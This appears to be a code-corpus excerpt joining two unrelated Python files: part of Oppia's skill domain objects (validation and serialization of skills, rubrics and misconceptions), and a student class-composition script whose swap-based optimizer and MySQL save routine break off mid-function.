if not isinstance(self.explanation, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected explanation to be a string, received %s' %
self.explanation)
if self.explanation == '' or self.explanation == '<p></p>':
raise utils.ValidationError('Explanation should be non empty')
class SkillContents(python_utils.OBJECT):
"""Domain object representing the skill_contents dict."""
def __init__(
self, explanation, worked_examples, recorded_voiceovers,
written_translations):
"""Constructs a SkillContents domain object.
Args:
explanation: SubtitledHtml. An explanation on how to apply the
skill.
worked_examples: list(SubtitledHtml). A list of worked examples
for the skill. Each element should be a SubtitledHtml object.
recorded_voiceovers: RecordedVoiceovers. The recorded voiceovers for
the skill contents and their translations in different
languages.
written_translations: WrittenTranslations. A text translation of
the skill contents.
"""
self.explanation = explanation
self.worked_examples = worked_examples
self.recorded_voiceovers = recorded_voiceovers
self.written_translations = written_translations
def validate(self):
"""Validates various properties of the SkillContents object.
Raises:
ValidationError: One or more attributes of skill contents are
invalid.
"""
available_content_ids = set([])
if not isinstance(self.explanation, state_domain.SubtitledHtml):
raise utils.ValidationError(
'Expected skill explanation to be a SubtitledHtml object, '
'received %s' % self.explanation)
self.explanation.validate()
available_content_ids.add(self.explanation.content_id)
if not isinstance(self.worked_examples, list):
raise utils.ValidationError(
'Expected worked examples to be a list, received %s' %
self.worked_examples)
for example in self.worked_examples:
if not isinstance(example, state_domain.SubtitledHtml):
raise utils.ValidationError(
'Expected worked example to be a SubtitledHtml object, '
'received %s' % example)
if example.content_id in available_content_ids:
raise utils.ValidationError(
'Found a duplicate content id %s' % example.content_id)
available_content_ids.add(example.content_id)
example.validate()
self.recorded_voiceovers.validate(available_content_ids)
self.written_translations.validate(available_content_ids)
def to_dict(self):
"""Returns a dict representing this SkillContents domain object.
Returns:
A dict, mapping all fields of SkillContents instance.
"""
return {
'explanation': self.explanation.to_dict(),
'worked_examples': [worked_example.to_dict()
for worked_example in self.worked_examples],
'recorded_voiceovers': self.recorded_voiceovers.to_dict(),
'written_translations': self.written_translations.to_dict()
}
@classmethod
def from_dict(cls, skill_contents_dict):
"""Return a SkillContents domain object from a dict.
Args:
skill_contents_dict: dict. The dict representation of
SkillContents object.
Returns:
SkillContents. The corresponding SkillContents domain object.
"""
skill_contents = cls(
state_domain.SubtitledHtml(
skill_contents_dict['explanation']['content_id'],
skill_contents_dict['explanation']['html']),
[state_domain.SubtitledHtml(
worked_example['content_id'],
worked_example['html'])
for worked_example in skill_contents_dict['worked_examples']],
state_domain.RecordedVoiceovers.from_dict(skill_contents_dict[
'recorded_voiceovers']),
state_domain.WrittenTranslations.from_dict(skill_contents_dict[
'written_translations'])
)
return skill_contents
class Skill(python_utils.OBJECT):
"""Domain object for an Oppia Skill."""
def __init__(
self, skill_id, description, misconceptions, rubrics,
skill_contents, misconceptions_schema_version,
rubric_schema_version, skill_contents_schema_version,
language_code, version, next_misconception_id, superseding_skill_id,
all_questions_merged, created_on=None, last_updated=None):
"""Constructs a Skill domain object.
Args:
skill_id: str. The unique ID of the skill.
description: str. Describes the observable behaviour of the skill.
misconceptions: list(Misconception). The list of misconceptions
associated with the skill.
rubrics: list(Rubric). The list of rubrics that explain each
difficulty level of a skill.
skill_contents: SkillContents. The object representing the contents
of the skill.
misconceptions_schema_version: int. The schema version for the
misconceptions object.
rubric_schema_version: int. The schema version for the
rubric object.
skill_contents_schema_version: int. The schema version for the
skill_contents object.
language_code: str. The ISO 639-1 code for the language this
skill is written in.
version: int. The version of the skill.
next_misconception_id: int. The misconception id to be used by
the next misconception added.
superseding_skill_id: str|None. Skill ID of the skill we
merge this skill into. This is non null only if we indicate
that this skill is a duplicate and needs to be merged into
another one.
all_questions_merged: bool. Flag that indicates if all
questions are moved from this skill to the superseding skill.
created_on: datetime.datetime. Date and time when the skill is
created.
last_updated: datetime.datetime. Date and time when the
skill was last updated.
"""
self.id = skill_id
self.description = description
self.misconceptions = misconceptions
self.skill_contents = skill_contents
self.misconceptions_schema_version = misconceptions_schema_version
self.rubric_schema_version = rubric_schema_version
self.skill_contents_schema_version = skill_contents_schema_version
self.language_code = language_code
self.created_on = created_on
self.last_updated = last_updated
self.version = version
self.rubrics = rubrics
self.next_misconception_id = next_misconception_id
self.superseding_skill_id = superseding_skill_id
self.all_questions_merged = all_questions_merged
@classmethod
def require_valid_skill_id(cls, skill_id):
"""Checks whether the skill id is a valid one.
Args:
skill_id: str. The skill id to validate.
"""
if not isinstance(skill_id, python_utils.BASESTRING):
raise utils.ValidationError('Skill id should be a string.')
if len(skill_id) != 12:
raise utils.ValidationError('Invalid skill id.')
@classmethod
def require_valid_description(cls, description):
"""Checks whether the description of the skill is a valid one.
Args:
description: str. The description to validate.
"""
if not isinstance(description, python_utils.BASESTRING):
raise utils.ValidationError('Description should be a string.')
if description == '':
raise utils.ValidationError('Description field should not be empty')
def validate(self):
"""Validates various properties of the Skill object.
Raises:
ValidationError: One or more attributes of skill are invalid.
"""
self.require_valid_description(self.description)
Misconception.require_valid_misconception_id(self.next_misconception_id)
if not isinstance(self.misconceptions_schema_version, int):
raise utils.ValidationError(
'Expected misconceptions schema version to be an integer, '
'received %s' % self.misconceptions_schema_version)
if (
self.misconceptions_schema_version !=
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected misconceptions schema version to be %s, received %s'
% (
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION,
self.misconceptions_schema_version)
)
if not isinstance(self.rubric_schema_version, int):
raise utils.ValidationError(
'Expected rubric schema version to be an integer, '
'received %s' % self.rubric_schema_version)
if (
self.rubric_schema_version !=
feconf.CURRENT_RUBRIC_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected rubric schema version to be %s, received %s'
% (
feconf.CURRENT_RUBRIC_SCHEMA_VERSION,
self.rubric_schema_version)
)
if not isinstance(self.skill_contents_schema_version, int):
raise utils.ValidationError(
'Expected skill contents schema version to be an integer, '
'received %s' % self.skill_contents_schema_version)
if (
self.skill_contents_schema_version !=
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION):
raise utils.ValidationError(
'Expected skill contents schema version to be %s, received %s'
% (
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION,
self.skill_contents_schema_version)
)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language code: %s' % self.language_code)
if not isinstance(self.skill_contents, SkillContents):
raise utils.ValidationError(
'Expected skill_contents to be a SkillContents object, '
'received %s' % self.skill_contents)
self.skill_contents.validate()
if not isinstance(self.rubrics, list):
raise utils.ValidationError(
'Expected rubrics to be a list, '
                'received %s' % self.rubrics)
difficulties_list = []
for rubric in self.rubrics:
if not isinstance(rubric, Rubric):
raise utils.ValidationError(
'Expected each rubric to be a Rubric '
'object, received %s' % rubric)
if rubric.difficulty in difficulties_list:
raise utils.ValidationError(
'Duplicate rubric found for: %s' % rubric.difficulty)
difficulties_list.append(rubric.difficulty)
rubric.validate()
if len(difficulties_list) != 3:
raise utils.ValidationError(
'All 3 difficulties should be addressed in rubrics')
if difficulties_list != constants.SKILL_DIFFICULTIES:
raise utils.ValidationError(
'The difficulties should be ordered as follows [%s, %s, %s]'
% (
constants.SKILL_DIFFICULTIES[0],
constants.SKILL_DIFFICULTIES[1],
constants.SKILL_DIFFICULTIES[2]))
if not isinstance(self.misconceptions, list):
raise utils.ValidationError(
'Expected misconceptions to be a list, '
'received %s' % self.misconceptions)
misconception_id_list = []
for misconception in self.misconceptions:
if not isinstance(misconception, Misconception):
raise utils.ValidationError(
'Expected each misconception to be a Misconception '
'object, received %s' % misconception)
if misconception.id in misconception_id_list:
raise utils.ValidationError(
'Duplicate misconception ID found: %s' % misconception.id)
misconception_id_list.append(misconception.id)
if int(misconception.id) >= int(self.next_misconception_id):
raise utils.ValidationError(
'The misconception with id %s is out of bounds.'
% misconception.id)
misconception.validate()
if (self.all_questions_merged and
self.superseding_skill_id is None):
raise utils.ValidationError(
'Expected a value for superseding_skill_id when '
'all_questions_merged is True.')
if (self.superseding_skill_id is not None and
self.all_questions_merged is None):
raise utils.ValidationError(
'Expected a value for all_questions_merged when '
'superseding_skill_id is set.')
def to_dict(self):
"""Returns a dict representing this Skill domain object.
Returns:
A dict, mapping all fields of Skill instance.
"""
return {
'id': self.id,
'description': self.description,
'misconceptions': [
misconception.to_dict()
for misconception in self.misconceptions],
'rubrics': [
rubric.to_dict() for rubric in self.rubrics],
'skill_contents': self.skill_contents.to_dict(),
'language_code': self.language_code,
'misconceptions_schema_version': self.misconceptions_schema_version,
'rubric_schema_version': self.rubric_schema_version,
'skill_contents_schema_version': self.skill_contents_schema_version,
'version': self.version,
'next_misconception_id': self.next_misconception_id,
'superseding_skill_id': self.superseding_skill_id,
'all_questions_merged': self.all_questions_merged
}
@classmethod
def create_default_skill(cls, skill_id, description, rubrics):
"""Returns a skill domain object with default values. This is for
the frontend where a default blank skill would be shown to the user
when the skill is created for the first time.
Args:
skill_id: str. The unique id of the skill.
description: str. The initial description for the skill.
rubrics: list(Rubric). The list of rubrics for the skill.
Returns:
Skill. The Skill domain object with the default values.
"""
explanation_content_id = feconf.DEFAULT_SKILL_EXPLANATION_CONTENT_ID
skill_contents = SkillContents(
state_domain.SubtitledHtml(
explanation_content_id, feconf.DEFAULT_SKILL_EXPLANATION), [],
state_domain.RecordedVoiceovers.from_dict({
'voiceovers_mapping': {
explanation_content_id: {}
}
}),
state_domain.WrittenTranslations.from_dict({
'translations_mapping': {
explanation_content_id: {}
}
}))
return cls(
skill_id, description, [], rubrics, skill_contents,
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION,
feconf.CURRENT_RUBRIC_SCHEMA_VERSION,
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION,
constants.DEFAULT_LANGUAGE_CODE, 0, 0, None, False)
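    # Illustrative usage sketch (not part of the original module): a default
    # skill needs one Rubric per difficulty in constants.SKILL_DIFFICULTIES and
    # a 12-character skill id. The values below are placeholders.
    #
    #     rubrics = [
    #         Rubric(difficulty, '<p>Explanation.</p>')
    #         for difficulty in constants.SKILL_DIFFICULTIES]
    #     skill = Skill.create_default_skill(
    #         'abcdefghijkl', 'Sort a list of numbers', rubrics)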
@classmethod
def update_skill_contents_from_model(
cls, versioned_skill_contents, current_version):
"""Converts the skill_contents blob contained in the given
versioned_skill_contents dict from current_version to
current_version + 1. Note that the versioned_skill_contents being
passed in is modified in-place.
Args:
versioned_skill_contents: dict. A dict with two keys:
- schema_version: str. The schema version for the
skill_contents dict.
- skill_contents: dict. The dict comprising the skill
contents.
current_version: int. The current schema version of skill_contents.
"""
versioned_skill_contents['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_skill_contents_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
versioned_skill_contents['skill_contents'] = conversion_fn(
versioned_skill_contents['skill_contents'])
@classmethod
def update_misconceptions_from_model(
cls, versioned_misconceptions, current_version):
"""Converts the misconceptions blob contained in the given
versioned_misconceptions dict from current_version to
current_version + 1. Note that the versioned_misconceptions being
passed in is modified in-place.
Args:
versioned_misconceptions: dict. A dict with two keys:
- schema_version: str. The schema version for the
misconceptions dict.
- misconceptions: list(dict). The list of dicts comprising the
misconceptions of the skill.
current_version: int. The current schema version of misconceptions.
"""
versioned_misconceptions['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_misconception_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
updated_misconceptions = []
for misconception in versioned_misconceptions['misconceptions']:
updated_misconceptions.append(conversion_fn(misconception))
versioned_misconceptions['misconceptions'] = updated_misconceptions
@classmethod
def update_rubrics_from_model(cls, versioned_rubrics, current_version):
"""Converts the rubrics blob contained in the given
versioned_rubrics dict from current_version to
current_version + 1. Note that the versioned_rubrics being
passed in is modified in-place.
Args:
versioned_rubrics: dict. A dict with two keys:
- schema_version: str. The schema version for the
rubrics dict.
- rubrics: list(dict). The list of dicts comprising the
rubrics of the skill.
current_version: int. The current schema version of rubrics.
"""
versioned_rubrics['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_rubric_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
updated_rubrics = []
for rubric in versioned_rubrics['rubrics']:
updated_rubrics.append(conversion_fn(rubric))
versioned_rubrics['rubrics'] = updated_rubrics
def update_description(self, description):
"""Updates the description of the skill.
Args:
description: str. The new description of the skill.
"""
self.description = description
def update_language_code(self, language_code):
"""Updates the language code of the skill.
Args:
language_code: str. The new language code of the skill.
"""
self.language_code = language_code
def update_superseding_skill_id(self, superseding_skill_id):
"""Updates the superseding skill ID of the skill.
Args:
superseding_skill_id: str. ID of the skill that supersedes this one.
"""
self.superseding_skill_id = superseding_skill_id
def record_that_all_questions_are_merged(self, all_questions_merged):
"""Updates the flag value which indicates if all questions are merged.
Args:
all_questions_merged: bool. Flag indicating if all questions are
merged to the superseding skill.
"""
self.all_questions_merged = all_questions_merged
def update_explanation(self, explanation):
"""Updates the explanation of the skill.
Args:
explanation: SubtitledHtml. The new explanation of the skill.
"""
self.skill_contents.explanation = (
state_domain.SubtitledHtml.from_dict(explanation))
def update_worked_examples(self, worked_examples):
"""Updates the worked examples list of the skill.
Args:
worked_examples: list(dict). The new worked examples of the skill.
"""
old_content_ids = [worked_example.content_id for worked_example in (
self.skill_contents.worked_examples)]
self.skill_contents.worked_examples = [
state_domain.SubtitledHtml.from_dict(worked_example)
for worked_example in worked_examples]
new_content_ids = [worked_example.content_id for worked_example in (
self.skill_contents.worked_examples)]
self._update_content_ids_in_assets(old_content_ids, new_content_ids)
def _update_content_ids_in_assets(self, old_ids_list, new_ids_list):
"""Adds or deletes content ids in recorded_voiceovers and
written_translations.
Args:
old_ids_list: list(str). A list of content ids present earlier
in worked_examples.
new_ids_list: list(str). A list of content ids currently present
in worked_examples.
"""
content_ids_to_delete = set(old_ids_list) - set(new_ids_list)
content_ids_to_add = set(new_ids_list) - set(old_ids_list)
written_translations = self.skill_contents.written_translations
recorded_voiceovers = self.skill_contents.recorded_voiceovers
for content_id in content_ids_to_delete:
recorded_voiceovers.delete_content_id_for_voiceover(content_id)
written_translations.delete_content_id_for_translation(
content_id)
for content_id in content_ids_to_add:
recorded_voiceovers.add_content_id_for_voiceover(content_id)
written_translations.add_content_id_for_translation(content_id)
def _find_misconception_index(self, misconception_id):
"""Returns the index of the misconception with the given misconception
id, or None if it is not in the misconceptions list.
Args:
misconception_id: int. The id of the misconception.
Returns:
int or None. The index of the corresponding misconception, or None
if there is no such misconception.
"""
for ind, misconception in enumerate(self.misconceptions):
if misconception.id == misconception_id:
return ind
return None
def add_misconception(self, misconception_dict):
"""Adds a new misconception to the skill.
Args:
misconception_dict: dict. The misconception to be added.
"""
misconception = Misconception(
misconception_dict['id'],
misconception_dict['name'],
misconception_dict['notes'],
misconception_dict['feedback'])
self.misconceptions.append(misconception)
self.next_misconception_id = self.get_incremented_misconception_id(
misconception_dict['id'])
def update_rubric(self, difficulty, explanation):
"""Adds or updates the rubric of the given difficulty.
Args:
difficulty: str. The difficulty of the rubric.
explanation: str. The explanation for the rubric.
"""
for rubric in self.rubrics:
if rubric.difficulty == difficulty:
rubric.explanation = explanation
return
raise ValueError(
'There is no rubric for the given difficulty.')
def get_incremented_misconception_id(self, misconception_id):
"""Returns the incremented misconception id.
Args:
misconception_id: int. The id of the misconception to be
incremented.
Returns:
int. The incremented misconception id.
"""
return misconception_id + 1
def delete_misconception(self, misconception_id):
"""Removes a misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be removed.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
del self.misconceptions[index]
def update_misconception_name(self, misconception_id, name):
"""Updates the name of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
name: str. The new name of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].name = name
def update_misconception_notes(self, misconception_id, notes):
"""Updates the notes of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
notes: str. The new notes of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].notes = notes
def update_misconception_feedback(self, misconception_id, feedback):
"""Updates the feedback of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
feedback: str. The html string that corresponds to the new feedback
of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].feedback = feedback
class SkillSummary(python_utils.OBJECT):
"""Domain object for Skill Summary."""
def __init__(
self, skill_id, description, language_code, version,
misconception_count, worked_examples_count, skill_model_created_on,
skill_model_last_updated):
"""Constructs a SkillSummary domain object.
Args:
skill_id: str. The unique id of the skill.
description: str. The short description of the skill.
language_code: str. The language code of the skill.
version: int. The version of the skill.
misconception_count: int. The number of misconceptions associated
with the skill.
worked_examples_count: int. The number of worked examples in the
skill.
skill_model_created_on: datetime.datetime. Date and time when
the skill model is created.
skill_model_last_updated: datetime.datetime. Date and time
when the skill model was last updated.
"""
self.id = skill_id
self.description = description
self.language_code = language_code
self.version = version
self.misconception_count = misconception_count
self.worked_examples_count = worked_examples_count
self.skill_model_created_on = skill_model_created_on
self.skill_model_last_updated = skill_model_last_updated
def validate(self):
"""Validates various properties of the Skill Summary object.
Raises:
ValidationError: One or more attributes of skill summary are
invalid.
"""
if not isinstance(self.description, python_utils.BASESTRING):
raise utils.ValidationError('Description should be a string.')
if self.description == '':
raise utils.ValidationError('Description field should not be empty')
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language code: %s' % self.language_code)
if not isinstance(self.misconception_count, int):
raise utils.ValidationError(
'Expected misconception_count to be an int, '
'received \'%s\'' % self.misconception_count)
if self.misconception_count < 0:
raise utils.ValidationError(
'Expected misconception_count to be non-negative, '
'received \'%s\'' % self.misconception_count)
if not isinstance(self.worked_examples_count, int):
raise utils.ValidationError(
'Expected worked_examples_count to be an int, '
'received \'%s\'' % self.worked_examples_count)
if self.worked_examples_count < 0:
raise utils.ValidationError(
'Expected worked_examples_count to be non-negative, '
'received \'%s\'' % self.worked_examples_count)
def to_dict(self):
"""Returns a dictionary representation of this domain object.
Returns:
dict. A dict representing this SkillSummary object.
"""
return {
'id': self.id,
'description': self.description,
'language_code': self.language_code,
'version': self.version,
'misconception_count': self.misconception_count,
'worked_examples_count': self.worked_examples_count,
'skill_model_created_on': utils.get_time_in_millisecs(
self.skill_model_created_on),
'skill_model_last_updated': utils.get_time_in_millisecs(
self.skill_model_last_updated)
}
class SkillRights(python_utils.OBJECT):
"""Domain object for skill rights."""
def __init__(self, skill_id, skill_is_private, creator_id):
"""Constructor for a skill rights domain object.
Args:
skill_id: str. The id of the skill.
skill_is_private: bool. Whether the skill is private.
creator_id: str. The id of the creator of this skill.
"""
self.id = skill_id
self.skill_is_private = skill_is_private
self.creator_id = creator_id
def to_dict(self):
"""Returns a dict suitable for use by the frontend.
Returns:
dict. A dict version of SkillRights suitable for use by the
frontend.
"""
return {
'skill_id': self.id,
'skill_is_private': self.skill_is_private,
'creator_id': self.creator_id
}
def is_creator(self, user_id):
"""Checks whether the given user is the creator of this skill.
Args:
user_id: str. Id of the user.
Returns:
bool. Whether the user is the creator of this skill.
"""
return bool(user_id == self.creator_id)
def is_private(self):
"""Returns whether the skill is private.
Returns:
bool. Whether the skill is private.
"""
return self.skill_is_private
class SkillRightsChange(change_domain.BaseChange):
"""Domain object for changes made to a skill rights object.
The allowed commands, together with the attributes:
- 'create_new'
- 'publish_skill'.
"""
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': [],
'optional_attribute_names': []
}, {
'name': CMD_PUBLISH_SKILL,
'required_attribute_names': [],
'optional_attribute_names': []
}]
class UserSkillMastery(python_utils.OBJECT):
"""Domain object for a user's mastery of a particular skill."""
def __init__(self, user_id, skill_id, degree_of_mastery):
"""Constructs a SkillMastery domain object for a user.
Args:
user_id: str. The user id of the user.
skill_id: str. The id of the skill.
degree_of_mastery: float. The user's mastery of the
corresponding skill.
"""
self.user_id = user_id
self.skill_id = skill_id
self.degree_of_mastery = degree_of_mastery
def to_dict(self):
"""Returns a dictionary representation of this domain object.
Returns:
dict. A dict representing this SkillMastery object.
"""
return {
'user_id': self.user_id,
'skill_id': self.skill_id,
'degree_of_mastery': self.degree_of_mastery
}
@classmethod
def from_dict(cls, skill_mastery_dict):
"""Returns a UserSkillMastery domain object from the given dict.
Args:
skill_mastery_dict: dict. A dict mapping all the fields of
UserSkillMastery object.
Returns:
SkillMastery. The SkillMastery domain object.
"""
return cls(
skill_mastery_dict['user_id'],
skill_mastery_dict['skill_id'],
skill_mastery_dict['degree_of_mastery']
)
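# Illustrative usage sketch (not part of the original module): UserSkillMastery
# serialises symmetrically through to_dict()/from_dict(); the ids below are
# placeholders.
#
#     mastery = UserSkillMastery('user_1', 'skill_1', 0.75)
#     restored = UserSkillMastery.from_dict(mastery.to_dict())
#     assert restored.degree_of_mastery == 0.75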
|
the-stack_0_6486 | import random
import math
import time
import mysql.connector
import copy
import json
from .components.DBConfig import DBConfig
from .components.Configuration import Configuration
from .components.StudentsManager import StudentsManager
from .components.ContainersManager import ContainersManager
class CC:
def __init__(self, process_id, group_id, config_id):
self.process_id = process_id
self.group_id = group_id
self.config_id = config_id
def run(self):
print("Running CC...")
if self.group_id == "" or self.config_id == "":
return "NoGroupOrConfigSelected"
self.students_manager = StudentsManager(self.group_id)
self.configuration = Configuration(self.config_id)
self.containers_manager = ContainersManager(
14, # TODO: Set dynamic num of containers based on db configuration
# math.ceil(self.students_manager.get_number_of_students() / self.configuration.max_students),
self.configuration,
self.students_manager
)
self.total_number_of_students = self.students_manager.get_number_of_students()
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if self.total_number_of_students == 0:
return "ZeroStudentsIntoGroup"
print("Loaded students from db with id " + self.students_manager.group_id + ":",
self.total_number_of_students)
print("Loaded config from db with id " + self.configuration.config_id + ":",
self.configuration.config_name)
if self.is_already_generated():
print('Class Composition already generated! Exiting...')
return "CCAlreadyGenerated"
print("Created " + str(self.containers_manager.get_number_of_containers()) + " empty classes")
print("Sex priority: " + self.configuration.sex_priority)
configured_sex_priority_array = self.students_manager.get_sex_prioritized_students_array(
self.configuration.sex_priority,
self.configuration.num_sex_priority
)
print("Checking sex-prioritized array...")
for student_group in configured_sex_priority_array:
print("Student group length: " + str(len(student_group)), end="")
num_males, num_females = 0, 0
for student in student_group:
if student.sesso == "m":
num_males += 1
if student.sesso == "f":
num_females += 1
print(" - M: " + str(num_males) + " - F: " + str(num_females))
print("Finished checking sex-prioritized array...")
if len(configured_sex_priority_array) > self.containers_manager.get_number_of_containers():
print('<---WARNING---> Sex prioritized groups are more than possible containers!')
print('ABORT!')
return "TooManySexPrioritizedPeople"
students_not_inserted = self.containers_manager.distribute_sex_prioritized_groups_randomly_into_containers(
configured_sex_priority_array
)
print("Remaining students into StudentsManager:", self.students_manager.get_number_of_remaining_students())
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if len(students_not_inserted) > 0:
print("Some students from prioritized group weren't inserted!")
for student in students_not_inserted:
print("Student with matricola " + student.matricola + " was not inserted!")
else:
print("No students need to be reinserted, this is a good sign! :))")
# self.containers_manager.show_containers_statistics()
self.containers_manager.print_all_containers_current_dimensions()
print("Pairing and getting remaining students, matching by desiderata when possible...")
remaining_desiderata_students_array = self.students_manager.get_remaining_desiderata_students_array()
print("Found " + str(len(remaining_desiderata_students_array)) + " paired students!")
students_not_inserted = self.containers_manager.distribute_couples_randomly_into_containers(remaining_desiderata_students_array)
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if len(students_not_inserted) > 0:
print("Some O-O desiderata couple weren't inserted!")
for couple in students_not_inserted:
for student in couple:
print("Student with matricola " + student.matricola + " was not inserted!")
print("In total there are " + str(len(remaining_desiderata_students_array)) + " paired students to be reinserted!")
else:
print("No students need to be reinserted, this is a good sign! :))")
print("Getting remaining students on the database...")
remaining_students_array = self.students_manager.get_remaining_students_array()
remaining_students_after_random_insert = self.containers_manager.distribute_remaining_students_randomly_into_containers(remaining_students_array)
print("After random fill of remaining students, there are " + str(len(remaining_students_after_random_insert)) + " students to fill, still!")
if len(remaining_students_after_random_insert) == 0:
print("Well done, there is no students to swap of classroom, there!")
else:
print("We need to fill these " + str(len(remaining_students_after_random_insert)) + " students somewhere!")
if not self.containers_manager.fill_remaining_students_shuffling_classcontainers(remaining_students_after_random_insert):
return "CannotShuffleStudents"
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
minimum_balancing_status = self.containers_manager.rebalance_students_to_reach_minimum_number_of_students_per_container()
if minimum_balancing_status:
print("Now classes are minimum balanced!")
else:
print("Cannot balance by mininum amount!")
return "CannotBalanceClassesByMininumValue"
"""
print("BEFORE OPTIMIZATION:")
std_sum_before = 0
for container in self.containers_manager.containers:
print(f"ContainerID: {container.containerid} - Container AVG: {container.get_avg()} - Container STD: {container.get_std()}")
std_sum_before += container.get_avg()
print(f"AVG: [{self.containers_manager.get_avg()}] - STD: [{self.containers_manager.get_std()}]")
"""
self.optimize()
"""
print("AFTER OPTIMIZATION:")
std_sum_after = 0
for container in self.containers_manager.containers:
print(f"ContainerID: {container.containerid} - Container AVG: {container.get_avg()} - Container STD: {container.get_std()}")
std_sum_after += container.get_avg()
print(f"AVG: [{self.containers_manager.get_avg()}] - STD: [{self.containers_manager.get_std()}]")
print(f"RESULTS: {std_sum_before} - {std_sum_after}")"""
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
uninserted_students_by_matricola = self.students_manager.get_uninserted_students(self.containers_manager)
if len(uninserted_students_by_matricola) > 0:
print("\nWe found " + str(len(uninserted_students_by_matricola)) + " students not loaded, inserted and/or elaborated!")
print("Is it a correct number (TotalStudents == StudentsIntoContainers + UninsertedStudents)? -->", self.total_number_of_students == self.containers_manager.get_number_of_total_students_into_containers() + len(uninserted_students_by_matricola))
for matricola in uninserted_students_by_matricola:
print("Hey! Student with matricola " + matricola + " not loaded, inserted and/or elaborated!")
print("Remaining students into StudentsManager:", self.students_manager.get_number_of_remaining_students())
return "StudentsNotInsertedAfterShuffling"
else:
print("All students were inserted and elaborated correctly, good work!")
print("Saving CC to database...")
self.save_students_to_db()
print("Done!")
return True
def optimize(self):
def get_two_random_containers():
while True:
first_container = random.choice(self.containers_manager.containers)
second_container = random.choice(self.containers_manager.containers)
if first_container is not second_container:
break
return first_container, second_container
def get_std_of_two_containers(first_container, second_container):
first_container_avg = first_container.get_avg()
second_container_avg = second_container.get_avg()
containers_avg = (first_container_avg + second_container_avg) / 2
return math.sqrt(
(
math.pow(first_container_avg - containers_avg, 2) +
math.pow(second_container_avg - containers_avg, 2)
) / 2)
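        # Note (added commentary, not in the original): for two values the
        # expression above reduces to |avg1 - avg2| / 2, so the optimizer is
        # effectively accepting only swaps that bring the two container
        # averages closer together.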
def optimize_random_couple_of_containers_fixed_cycles(num_of_cycles):
first_container, second_container = get_two_random_containers()
previous_swap_std = get_std_of_two_containers(first_container, second_container)
effective_changes = 0
for _ in range(num_of_cycles):
first_container_student = first_container.get_random_student()
second_container_student = second_container.get_random_student()
first_container_student_copy = copy.deepcopy(first_container_student)
second_container_student_copy = copy.deepcopy(second_container_student)
if first_container_student.eligible_to_swap(self.configuration.sex_priority) \
and second_container_student.eligible_to_swap(self.configuration.sex_priority) \
and not first_container.has_desiderata(first_container_student) \
and not second_container.has_desiderata(second_container_student):
first_container.remove_student(first_container_student)
second_container.remove_student(second_container_student)
first_result = first_container.add_student(second_container_student)
second_result = second_container.add_student(first_container_student)
after_swap_std = get_std_of_two_containers(first_container, second_container)
if first_result == None and second_result == None:
if after_swap_std >= previous_swap_std:
first_container.remove_student(second_container_student)
second_container.remove_student(first_container_student)
first_result = first_container.add_student(first_container_student_copy)
second_result = second_container.add_student(second_container_student_copy)
else:
effective_changes += 1
else:
first_container.remove_student(second_container_student)
second_container.remove_student(first_container_student)
first_result = first_container.add_student(first_container_student_copy)
second_result = second_container.add_student(second_container_student_copy)
return effective_changes
print("Optimizing...")
num_of_optimizations = self.total_number_of_students
num_of_effective_optimizations = 0
for i in range(0, num_of_optimizations):
num_of_effective_optimizations += optimize_random_couple_of_containers_fixed_cycles(25)
if i % 25 == 0:
print(str(round(i / num_of_optimizations * 100, 2)) + "%\t\t" + str(i) + "\toptcycle\toptsdone\t" + str(num_of_effective_optimizations) + "\tstudents\t" + str(self.containers_manager.get_number_of_total_students_into_containers()))
print("100%! Effective swaps done: " + str(num_of_effective_optimizations) + "\n")
def save_students_to_db(self):
connection = mysql.connector.connect(
user=DBConfig.user,
password=DBConfig.password,
host=DBConfig.host,
database=DBConfig.database)
cursor = connection.cursor()
for container in self.containers_manager.containers:
container_ids = container.get_students_id()
